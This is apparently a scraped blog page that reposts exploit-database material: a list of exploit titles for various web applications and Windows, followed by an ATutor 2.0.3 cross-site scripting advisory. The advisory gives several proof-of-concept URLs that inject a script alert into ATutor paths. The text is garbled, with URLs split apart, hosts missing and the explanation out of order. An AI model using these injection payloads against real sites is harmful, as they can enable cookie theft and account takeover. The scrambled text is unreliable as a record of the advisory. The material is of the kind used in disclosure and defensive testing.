"S9Y Serendipity 1.7.5 - 'Backend' Multiple Vulnerabilities" "Multi Restaurant Table Reservation System 1.0 - Multiple Persistent XSS" "WonderCMS 3.1.3 - Authenticated Remote Code Execution" "Pharmacy Store Management System 1.0 - 'id' SQL Injection" "Car Rental Management System 1.0 - SQL Injection / Local File include" "Simple College Website 1.0 - 'page' Local File Inclusion" Password Reset leading to Account Takeover" "WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution" "WordPress Plugin Wp-FileManager 6.8 - RCE" "WonderCMS 3.1.3 - 'Menu' Persistent Cross-Site Scripting" "Microsoft Windows - Win32k Elevation of Privilege" "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" "DotCMS 20.11 - Stored Cross-Site Scripting" "ChurchCRM 4.2.0 - CSV/Formula Injection" "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" "Mitel mitel-cs018 - Call Data Information Disclosure" No rate Limit on Password Reset functionality" "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" php / " alert(okie)/index.php http : // com / ATutor / themes / default / social / basic_profile. css " alert(okie)/index.php http : // com / ATutor / about. php / jscripts / infusion / framework / fss / " alert(okie)/index.php http : // com / ATutor / registration. php / mods / _standard / flowplayer / " alert(okie)/index.php http : // com / ATutor / browse. php / jscripts / infusion / " alert(okie)/index.php http : // com / ATutor / login. php " alert(okie)/index.php http : // com / ATutor / login. php " alert(okie)/index.php http : // com / ATutor / password_reminder. php " alert(okie)/index.php http : // com / ATutor / search. php / " alert(okie) http : // com / ATutor / login. http : // com / ATutor / themes / default / tile_search / index. ATutor 2.0.3 is vulnerable other versions may also be affected. This can allow the attacker to steal cookie - based authentication credentials and launch other attacks. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. Source : https : // com / bid / 51423 / info ATutor is prone to multiple cross - site scripting vulnerabilities because it fails to properly sanitize user - supplied input before using it in dynamically generated content.
0 Comments
Leave a Reply. |
Details
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |